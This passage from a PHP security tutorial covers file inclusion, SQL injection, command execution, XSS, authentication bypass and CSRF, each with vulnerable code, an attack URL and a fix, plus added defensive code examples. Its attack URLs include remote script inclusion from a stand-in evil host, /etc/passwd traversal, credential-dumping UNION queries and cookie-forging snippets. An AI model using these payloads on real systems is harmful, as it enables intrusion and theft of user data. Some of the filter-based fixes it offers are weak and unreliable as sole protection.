- We can see here that the "pagina" variable is undeclared. We can set any value for the "pagina" variable. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

Now I will show why some people use ? and %00 after the link to the evil script.

# The "%00"

- Code snippet from test.php

-----------------------------------------------
<?php
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
-----------------------------------------------

- So if we request

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt

it will not work, because the script will try to include http://evilsite.com/evilscript.txt.php

So we will add a NULLBYTE ( %00 ) and all the shit after the nullbyte will not be taken into
consideration. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The script will successfully include our evilscript and will throw away the things
after the nullbyte.

# The "?"

- Code snippet from test.php

-----------------------------------------------
<?php
$pagina=$_GET['pagina'];
include $pagina.'logged=1';
?>
-----------------------------------------------

And the logged=1 will become like a variable. But better use the nullbyte. Example :

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

The evilscript will be included successfully.


3.1 - Simple example


Now an example from a script.

- Code snippet from index.php

----------------------------------------------------
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
----------------------------------------------------

We can see that the "main_content" variable is taken from $_REQUEST. The attacker can
set any value that he wants. Below, the "main_content" variable is included. So if we make the
following request :

http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt

Our evil script will be successfully included.


3.2 - How to fix


Simple way : Don't allow special chars in variables. Simple way : filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".


4) Local File Inclusion


- Tips : You can use the NULLBYTE and ? trick.
../ means a directory up
On Windows systems we can use "..\" instead of "../" . The "..\" will become "..%5C" ( urlencoded ).

The same functions let you include ( include, include_once, require, require_once ).


4.0 - Basic example


- Code snippet from test.php

-----------------------------------
<?php
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
-----------------------------------

Now, we cannot include our script because we cannot include remote files. We can include only
local files, as you see. So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The script will include "/pages/../../../../../../etc/passwd" successfully.

You can use the %00 and ? tricks here too. The same story.


4.1 - Simple example


- Code snippet from install/install.php

-------------------------------------
if(empty($_GET["url"]))
$url = 'step_welcome.php';
else
$url = $_GET["url"];
.............etc.............


-------------------------------------

We can see that the "url" variable is injectable. If the "url" variable is not set
(is empty) the script will include "step_welcome.php", otherwise it will include the
value set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The "etc/passwd" file will be successfully included.


4.2 - How to fix


Simple way : Don't allow special chars in variables. Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .


5) Local File Disclosure/Download


- Tips : Through this vulnerability you can read the content of files, not include them.

Some functions which let you read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file. Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()


5.0 - Basic example


- Code snippet from test.php

--------------------------------------
$pagina=$_GET['pagina'];
readfile($pagina);
?>
--------------------------------------

The readfile() function will read the content of the specified file. So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The content of etc/passwd will be output, NOT included.


5.1 - Simple example


- Code snippet from download.php

-----------------------------------------------------------------------------------
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();
-----------------------------------------------------------------------------------

The "file" variable is insecure. We see in the first line that it is read from $_REQUEST,
and the file is disclosed by the readfile() function. So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

We can successfully read the "etc/passwd" file.


5.2 - How to fix


Simple way : Don't allow special chars in variables. Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .
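
The fixes in 3.2, 4.2 and 5.2 filter characters; a stricter form of the same idea is an allow-list for include targets and a realpath() containment check for file reads. The following is an added example, not code from the scripts above; the page keys, directory names and helper names (resolve_page, resolve_download) are assumptions.

```php
<?php
// Added example, not from the original scripts: directory names and page keys are assumptions.

/** Map a request value to a fixed include file; unknown values fall back to the default. */
function resolve_page(string $requested, array $allowed, string $default): string
{
    // The request value is only ever used as an array key, never as part of a path.
    return $allowed[$requested] ?? $allowed[$default];
}

/**
 * Resolve $requested below $baseDir. Returns the canonical path, or null when
 * the target is missing, is not a regular file, or lies outside $baseDir.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    // Refuse NUL bytes and anything that looks like a URL or stream wrapper.
    if (strpos($requested, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*://#i', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks, so the prefix check
    // below is made against the file that would really be opened.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo data: a temporary directory stands in for the download folder.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/files', 0700, true);
file_put_contents($root . '/files/report.txt', "public report\n");
file_put_contents($root . '/secret.txt', "not for download\n");

// Request values taken from the examples above, plus one legitimate value each.
$pages = ['home' => 'pages/home.php', 'news' => 'pages/news.php'];
foreach (['news', '../../../../../../etc/passwd', 'http://evilsite.com/evilscript.txt'] as $r) {
    printf("page %-40s -> %s\n", $r, resolve_page($r, $pages, 'home'));
}
foreach (['report.txt', '../secret.txt', '../../../../../../etc/passwd'] as $r) {
    $path = resolve_download($root . '/files', $r);
    printf("file %-40s -> %s\n", $r, $path === null ? 'refused' : 'served ' . basename($path));
}

// Remove the demo files again.
unlink($root . '/files/report.txt');
unlink($root . '/secret.txt');
rmdir($root . '/files');
rmdir($root);
```

In a download script the returned path, never the raw request value, is what gets passed to readfile().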


6) SQL Injection


- Tips : If the user has file privileges you can read files.
If the user has file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload your code into a file.


6.0 - Basic example


- Code snippet from test.php

----------------------------------------------------------------------------------
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
----------------------------------------------------------------------------------

The "id" variable is not filtered. We can inject our SQL code in the "id" variable. Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--

And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and the user has
file privileges.


6.1 - Simple example


- Code snippet from house/listing_view.php

-----------------------------------------------------------------------------------------------------------------------------
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
-----------------------------------------------------------------------------------------------------------------------------

We see that the "id" variable takes the value set for "itemnr" and is not filtered in any way.
So we can inject our code. Let's make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--

And we get the email and the password from the users table.


6.2 - SQL Injection Login Bypass


- Code snippet from /admin/login.php

------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("

" . mysql_error() . "

\n");
------------------------------------------------------------------------------------------------------------------------------

The variables aren't properly checked. We can bypass this login. Let's inject the following username and password :

username : admin ' or ' 1=1
password : sirgod

We are logged in. Why? Look, the code will become

---------------------------------------------------------------------------------------------------------------------------------
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
---------------------------------------------------------------------------------------------------------------------------------

Login bypassed. The username must be an existing username.


6.3 - How to fix


Simple way : Don't allow special chars in variables. For numeric variables
use (int) , example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : - , . ( ) ' " _ + / *
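
Besides casting and filtering, the queries from 6.1 and 6.2 can be written so that user input never becomes part of the SQL text. This is an added example, not code from the scripts above: it uses PDO with an in-memory SQLite database as a stand-in for MySQL, password_hash()/password_verify() in place of the md5() call, and cut-down constructed tables.

```php
<?php
// Added example: parameterized queries. SQLite in memory stands in for the
// MySQL database of the original scripts; table contents are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$db->exec('CREATE TABLE login (id INTEGER PRIMARY KEY, brugernavn TEXT UNIQUE, password TEXT)');
$db->exec('CREATE TABLE Rentals (id INTEGER PRIMARY KEY, title TEXT, price INTEGER)');
$ins = $db->prepare('INSERT INTO login (brugernavn, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);
$db->exec("INSERT INTO Rentals (title, price) VALUES ('Flat near campus', 450)");

/** Listing lookup as in 6.1: "itemnr" must be a positive integer and is bound as one. */
function find_rental(PDO $db, $itemnr): ?array
{
    $id = filter_var($itemnr, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                       // not a number: no query is run at all
    }
    $stmt = $db->prepare('SELECT title, price FROM Rentals WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/** Login check as in 6.2: the username is a bound parameter, the password is verified in PHP. */
function check_login(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT password FROM login WHERE brugernavn = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    // Quotes inside $user are data here; they cannot change the WHERE clause.
    return is_string($hash) && password_verify($pass, $hash);
}

// Inputs: one legitimate value each, then the kind of values used in 6.1 and 6.2.
var_dump(find_rental($db, '1'));
var_dump(find_rental($db, 'null union all select 1,2'));
var_dump(check_login($db, 'admin', 'correct horse'));
var_dump(check_login($db, "admin ' or ' 1=1", 'sirgod'));
```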


7) Insecure Cookie Handling


- Tips : Write the code in the URL bar, don't use a cookie editor for this.


7.0 - Basic example


- Code snippet from test.php

---------------------------------------------------------------
if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; } else { die('not logged'); }
---------------------------------------------------------------

Something interesting here. If we set the "is_user_logged" cookie
to the value "1" we are logged in. Example :

javascript:document.cookie = "is_user_logged=1; path=/";

So practically we are logged in, we pass the check and we can access the admin panel.


7.1 - Simple example


- Code snippet from admin.php

----------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:
name=password> type=submit>
");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
----------------------------------------------------------------

The code looks exploitable. We can set a cookie value that lets us bypass the login
and tells the script that we are already logged in. Example :

javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";

What is 1246371700? It is the current time() echoed + 360.


7.2 - How to fix


Simple way : The most simple and efficient way : use SESSIONS .


8) Remote Command Execution


- Tips : If the script uses exec() you can't see the command output (but the command is executed)
unless the result is echoed by the script.
You can use AND operator ( || ) if the script executes more than one command .

In PHP there are some functions that let you execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output


8.0 - Basic example

- Code snippet from test.php

---------------------------------
$cmd=$_GET['cmd'];
system($cmd);
?>
---------------------------------

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be output.


8.1 - Simple example


- Code snippet from dig.php

-------------------------------------------------------------------------------------------
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type
");
echo '
';

system ("dig @$ns $host $query_type");
-------------------------------------------------------------------------------------------

The "ns" variable is unfiltered and can be specified by the attacker. An attacker can run any command
that he wants through this variable.

Let's make a request :

http://127.0.0.1/dig.php?ns=whoami&host=sirgod.net&query_type=NS&status=digging

The injection will fail. Why? The executed command will be : dig whoami sirgod.com NS and
it will not work, of course. Let's do something a little bit tricky. We have the AND operator
( || ) and we will use it to separate the commands. Example :

http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging

Our command will be executed. The command becomes "dig ||whoami|| sirgod.net NS".


8.2 - Advanced example


- Code snippet from add_reg.php

-------------------------------------------------------
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
...................etc......................
$html = " \$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
-------------------------------------------------------

We can see that the script creates a PHP file in the "sites" directory ( ourusername.php ).
The script saves all the user data in that file, so we can inject our evil code into one
field. I choose the "location" variable.

So if we register as a user with the location (set the "location" value) :



the code inside sites/ourusername.php will become :

-------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.ro";
?>
-------------------------------------------------

So we will get a parse error. Not good. We must inject proper code to get the result that we want.

Let's inject this code :

\";?>
So the code inside sites/ourusername.php will become :

--------------------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.ro";
?>
--------------------------------------------------------------

and we will have no error. Why? See the code :

$location = "";?>
Let's split it :

-------------------------------
$location = "";
?>

-------------------------------

We set the location value to "", close the first PHP tags, open the tags
again, write our evil code, close the tags, open them once more and add a variable
"xxx" because we don't want any error. I wrote that code because I want no
error; it can be modified to be smaller but will give some errors (they will not
stop us from executing commands but look ugly).

So if we make the following request :

http://127.0.0.1/sites/ourusername.php?cmd=whoami

Our command will be successfully executed.


8.3 - How to fix


Simple way : Don't allow user input .
Another way : Use escapeshellarg() and escapeshellcmd() functions .
Example : $cmd=escapeshellarg($_GET['cmd']);
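
Applied to dig.php from 8.1, the fix means validating each parameter against what dig actually expects and then quoting it. This is an added example, not the original script: the list of record types and the function names are assumptions, and the code only builds the command line without running it.

```php
<?php
// Added example, not the original dig.php: the allow-list of record types is an assumption.

/** True for a syntactically valid hostname or IP address (no leading "-", no shell characters). */
function is_dns_target(string $value): bool
{
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    // One DNS label: starts and ends with a letter or digit, hyphens only inside.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($value) <= 253
        && preg_match('/^' . $label . '(?:\.' . $label . ')*$/iD', $value) === 1;
}

/** Build the dig command line, or return null if any parameter fails validation. */
function build_dig_command(string $ns, string $host, string $queryType): ?string
{
    $allowedTypes = ['A', 'AAAA', 'ANY', 'CNAME', 'MX', 'NS', 'SOA', 'TXT'];
    $queryType = strtoupper(trim($queryType));
    $ns = strtolower(trim($ns));
    $host = strtolower(trim($host));

    if (!in_array($queryType, $allowedTypes, true)
        || !is_dns_target($ns)
        || !is_dns_target($host)) {
        return null;
    }
    // Validation already excludes shell metacharacters; escapeshellarg() is a
    // second layer that keeps each value a single argument whatever it contains.
    return 'dig ' . escapeshellarg('@' . $ns)
         . ' ' . escapeshellarg($host)
         . ' ' . escapeshellarg($queryType);
}

// Constructed requests: a normal lookup, then the "ns" value used in 8.1.
$requests = [
    ['127.0.0.1',  'sirgod.net', 'NS'],
    ['||whoami||', 'sirgod.net', 'NS'],
    ['127.0.0.1',  'sirgod.net', 'NS; id'],
];
foreach ($requests as [$ns, $host, $type]) {
    $cmd = build_dig_command($ns, $host, $type);
    printf("ns=%-12s type=%-8s -> %s\n", $ns, $type, $cmd ?? 'rejected');
}
```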


9) Remote Code Execution


- Tips : You must inject valid PHP code including terminating statements ( ; ) .


9.0 - Basic example


- Code snippet from test.php

-----------------------------------
$code=$_GET['code'];
eval($code);
?>
-----------------------------------

The "eval" function evaluates a string as PHP code. So in this case we are able to execute
our PHP code. Examples :

http://127.0.0.1/test.php?code=phpinfo();
http://127.0.0.1/test.php?code=system(whoami);

And we will see the output of the PHP code injected by us.


9.1 - Simple example


- Code snippet from system/services/init.php

------------------------------------------------
$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )
------------------------------------------------

We see that "anticode" is read from $_REQUEST and the coder
"secured" the input with "stripslashes", which is useless here: we don't need
slashes to execute our PHP code, only if we want to include a URL. So we can
inject our PHP code. Example :

http://127.0.0.1/test.php?anticode=phpinfo();

Great, injection done, phpinfo() result printed. No include because slashes are
removed, but we can use system() or another function to execute commands.


9.2 - How to fix


Simple way : Don't allow ";" and the PHP code will be invalid.
Another way : Don't allow any special char like "(" or ")" etc.


10) Cross-Site Scripting


- Tips : You can use a lot of vectors and try a lot of bypass methods; you can
find them around the web.


10.0 - Basic example


- Code snippet from test.php

---------------------------------
$name=$_GET['name'];
print $name;
?>
---------------------------------

The input is not filtered, so an attacker can inject JavaScript code. Example :

http://127.0.0.1/test.php?name=

A popup with the XSS message will be displayed. JavaScript code successfully executed.


10.1 - Another example


- Code snippet from test.php

-------------------------------------------
$name=addslashes($_GET['name']);
print '
';
?>
-------------------------------------------

Not an advanced example, only a bit complicated.

http://127.0.0.1/test.php?name=">

Why this vector? We put " because we must close the " from the "name" attribute
of the "table" tag, and > to close the "table" tag. Why String.fromCharCode? Because
we want to bypass the addslashes() function. Injection done.


10.2 - Simple example


- Code snippet from modules.php

---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------

The "name" variable is injectable and the input is not filtered, so we can easily inject
JavaScript code. Example :

http://127.0.0.1/test.php?name=


10.3 - How to fix


Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.
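
The first method depends on the flags passed to the function: before PHP 8.1 the default for htmlentities() and htmlspecialchars() was ENT_COMPAT, which leaves the single quote unescaped. The following added example (not code from the scripts above; the helper names and the table markup are assumptions, since the markup of 10.1 did not survive on this page) compares addslashes() with both flag sets.

```php
<?php
// Added example: one escaping helper, compared with addslashes() from section 10.1.

/** Escape a value for HTML text and for quoted attribute values. */
function e(string $value): string
{
    // ENT_QUOTES covers both " and ', so single-quoted attributes are covered too;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Run the same value through each encoder to see which characters survive. */
function compare_encoders(string $value): array
{
    return [
        // Backslashes mean nothing to an HTML parser, so quotes still end an attribute.
        'addslashes' => addslashes($value),
        // Escapes & < > and the double quote, but not the single quote.
        'ENT_COMPAT' => htmlspecialchars($value, ENT_COMPAT, 'UTF-8'),
        // Escapes & < > and both quote characters.
        'ENT_QUOTES' => e($value),
    ];
}

/** Assumed markup: the value is used once in a quoted attribute and once as text. */
function render_row(string $name): string
{
    // Attribute values are always quoted; escaping alone does not protect an
    // unquoted attribute, because spaces are not escaped.
    return '<table name="' . e($name) . '"><tr><td>' . e($name) . '</td></tr></table>';
}

// Constructed sample values containing each character that matters.
foreach (['Alice', "O'Brien", '"><b>bold</b>'] as $sample) {
    echo "input: ", $sample, "\n";
    foreach (compare_encoders($sample) as $encoder => $out) {
        printf("  %-10s %s\n", $encoder, $out);
    }
    echo "  rendered   ", render_row($sample), "\n";
}
```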


11) Authentication Bypass


- Tips : Look deep in the scripts, look in the admin directories,
maybe they are not protected; also look for undefined variables
like "login" or "auth".


11.0 - Basic example


I will provide a simple example of authentication bypass
via login variable.

- Code snippet from test.php

---------------------------------
if ($logged==true) {
echo 'Logged in.'; }
else {
print 'Not logged in.';
}
?>
---------------------------------

Here we need register_globals = on . I will talk about php.ini
settings a bit later in this tutorial. If we set the value of the $logged
variable to 1 the if condition will be true and we are logged in.
Example :

http://127.0.0.1/test.php?logged=1

And we are logged in.


11.1 - Via login variable


- Code snippet from login.php

------------------------------------------------------------------------------------
if ($login_ok)
{
$_SESSION['loggato'] = true;
echo "

$txt_pass_ok

";
echo"";
}
------------------------------------------------------------------------------------

Let's see. If the "login_ok" variable is TRUE ( 1 ) the script sets a SESSION flag that
tells the script that we are logged in. So let's set the "login_ok" variable to TRUE.
Example :

http://127.0.0.1/login.php?login_ok=1

Now we are logged in.


11.2 - Unprotected Admin CP


You couldn't believe this, but some PHP scripts don't protect the admin
control panel : no login, no .htaccess, nothing. So we simply go to
the admin panel directory and take control of the website.
Example :

http://127.0.0.1/admin/files.php

We accessed the admin panel with a simple request.


11.3 - How to fix


- Login variable bypass : Use a REAL authentication system, don't check the
login like that, use SESSION verification. Example :

if($_SESSION['logged']==1) {
echo 'Logged in'; }
else { echo 'Not logged in';
}

- Unprotected Admin CP : Use an authentication system or use .htaccess to
allow access from specific IPs or .htpasswd to
request a username and a password for the admin CP.
Example :

.htaccess :

Order deny,allow
deny from all
allow from 127.0.0.1

.htpasswd :

AuthUserFile /the/path/.htpasswd
AuthType Basic
AuthName "Admin CP"
Require valid-user

and /the/path/.htpasswd

sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.


12) Insecure Permissions


Tips : Look deep into the files, check whether the script requires you to be
logged in to do something; maybe the script doesn't.
Watch out for insecure permissions, maybe you can do admin
things without login.


12.0 - Basic example


Think of a script that lets the admin look up
the users database through a file placed in the /admin directory. That
file is named...hmmm : db_lookup.php.

- Code snippet from admin/db_lookup.php

--------------------------------------------
// Lookup in the database
readfile('protected/usersdb.txt');
?>
--------------------------------------------

Let's think. We cannot access the "protected" directory because
it is .htaccess'ed. But look at this file: no logged-in check, nothing.
So if we access :

http://127.0.0.1/admin/db_lookup.php

We can see the database. Remember, this is only an example created by
me, not a real one; you can find this kind of vulnerability in scripts.


12.1 - Read the users/passwords


Oh yeah, some coders are so stupid. They save the usernames and passwords
in text files, UNPROTECTED. A simple example from a script :

http://127.0.0.1/userpwd.txt

And we read the file,the usernames and passwords are there.


12.2 - Download Backups


Some scripts have database backup functions; some are safe, some are not.
I will show you a real script example :

- Code snippet from /adminpanel/phpmydump.php

--------------------------------------------------------------------------------
function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
$con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");
$db=@mysql_select_db($dbname,$con) or die("Could not select db");
.............................. etc ..........................
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
--------------------------------------------------------------------------------

After a lot of code the function is called. I didn't paste the entire code
because it is huge. I analyzed the script: no login required, no check, nothing. So
if we access the file directly the download of the backup will start. Example :

http://127.0.0.1/adminpanel/phpmydump.php

Now we have the database backup saved in our computer.


12.3 - INC files


Some scripts save important data in INC files. Usually the INC files contain PHP
code with the database configuration. The INC files can be viewed in the
browser even though they contain PHP code. So a simple request will be enough to
access and read the file. Example :

http://127.0.0.1/inc/mysql.inc

Now we have the database connection details. Look deep in scripts, there are many
scripts that save important data in INC files.


12.4 - How to fix


- Basic example : Check if the admin is logged in, if not, redirect.

- Read the users/passwords : Save the records in a MySQL database
or in a protected file/directory.

- Download Backups : Check if the admin is logged in, if not, redirect.

- INC files : Save the configuration in proper files, like .php, or
protect the directory with an .htaccess file.


13) Cross Site Request Forgery


- Tips : Through CSRF you can change the admin password, it is not
so inoffensive.
It can be used with XSS, redirected from XSS.


13.0 - Basic example


- Code snippet from test.php

-----------------------------------------
check_auth();
if(isset($_GET['news']))
{ unlink('files/news'.$news.'.txt'); }
else {
die('File not deleted'); }
?>
-----------------------------------------

In this example you will see what CSRF is and how it works. In the "files"
directory are saved the news written by the author. The news are saved like
"news1.txt", "news2.txt" etc. So the admin can delete the news. The news that
he wants to delete will be specified in the "news" variable. If he wants to delete
news1.txt the value of "news" will be "1". We cannot execute this without
admin permissions; look, the script checks if we are logged in.
I will show you an example. If we request :

http://127.0.0.1/test.php?news=1

The /news/news1.txt file will be deleted. The script deletes the file directly,
without any notice. So we can use this to delete a file. All we need is to trick
the admin into clicking our evil link and the file specified by us in the "news"
variable will be deleted.


13.1 - Simple example


In a way the code below is included in the index.php file. I
will not paste all the includes, there are a lot.

- Code snippet from includes/pages/admin.php

--------------------------------------------------------------------
if ($_GET['act'] == '') {
include "includes/pages/admin/home.php";
} else {
include "includes/pages/admin/" . $_GET['act'] . ".php";
--------------------------------------------------------------------

Here we can see how "includes/pages/admin/members.php" is included in
this file. If "act=members" the file below will be included.


- Code snippet from includes/pages/admin/members.php

----------------------------------------------------------------------------------------------
if ($_GET['func'] == 'delete') {
$del_id = $_GET['id'];
$query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
$result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
while ($results2121 = mysql_fetch_array($result2121)) {
$their_role = $results2121['ROLE'];
}
if ($their_role != '1') {
mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error());
----------------------------------------------------------------------------------------------

We can see here that if "func=delete" is passed in the URL, the script will
delete from the database the user with the specified ID ( $id ) without any
confirmation. Example :

http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

The script checks if the admin is logged in, so if we trick the admin into clicking
our evil link the user who has the specified ID in the database will be deleted
without any confirmation.


13.2 - How to fix


- Simple way : Use tokens. At each login, generate a random token and save it
in the session. Request the token in the URL to do administrative
actions; if the token is missing or wrong, don't execute the
action. I will show you only how to check if the token
is present and is correct. Example :

-------------------------------------------------------
check_auth();
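// Compare (not assign) the token from the request with the one saved in the session.
if(isset($_GET['news']) && isset($_GET['token']) && $_GET['token'] === $_SESSION['token'])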
{ unlink('files/news'.$news.'.txt'); }
else {
die('Error.'); }
?>
-------------------------------------------------------

The request will look like this one :

http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]

So this request will be fine, the news will be deleted.


- Another way : Do some complicated confirmations or request a password
to do administrative actions.
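
The token approach in full, including the generation step that the snippet above leaves out. This is an added example, not the original script: $session and $request are plain arrays standing in for $_SESSION and the request data, the function names are assumptions, and it goes one step beyond the text by accepting the delete only over POST.

```php
<?php
// Added example, not the original script. $session stands in for $_SESSION and
// $request for $_POST so the logic can run from the command line.

/** Call once after a successful login: store a fresh random token in the session. */
function csrf_issue_token(array &$session): string
{
    $session['token'] = bin2hex(random_bytes(32));
    return $session['token'];
}

/** Constant-time comparison of the submitted token with the session token. */
function csrf_token_valid(array $session, array $request): bool
{
    $expected = $session['token'] ?? '';
    $supplied = $request['token'] ?? '';
    return is_string($expected) && $expected !== ''
        && is_string($supplied) && hash_equals($expected, $supplied);
}

/** Delete news<N>.txt only for a logged-in admin, via POST, with a valid token. */
function delete_news(array $session, string $method, array $request, string $dir): string
{
    if (empty($session['logged'])) {
        return 'not logged in';
    }
    if ($method !== 'POST') {          // state-changing actions are not served over GET
        return 'method not allowed';
    }
    if (!csrf_token_valid($session, $request)) {
        return 'bad token';
    }
    // The id is validated as an integer, so it cannot carry path characters.
    $id = filter_var($request['news'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return 'bad id';
    }
    $file = $dir . DIRECTORY_SEPARATOR . 'news' . $id . '.txt';
    return (is_file($file) && unlink($file)) ? 'deleted' : 'not found';
}

// Constructed demo: a temporary directory stands in for the "files" directory.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'news_demo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/news1.txt', "first post\n");

$session = ['logged' => 1];
$token = csrf_issue_token($session);

// A GET link, a POST without the token, then the form post carrying the token.
echo delete_news($session, 'GET',  ['news' => '1', 'token' => $token], $dir), "\n";
echo delete_news($session, 'POST', ['news' => '1'], $dir), "\n";
echo delete_news($session, 'POST', ['news' => '1', 'token' => $token], $dir), "\n";
rmdir($dir);
```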


14) Shoutz


Shoutz to all www.insecurity.ro & www.h4cky0u.org members. If you have some suggestions or
questions just email me.
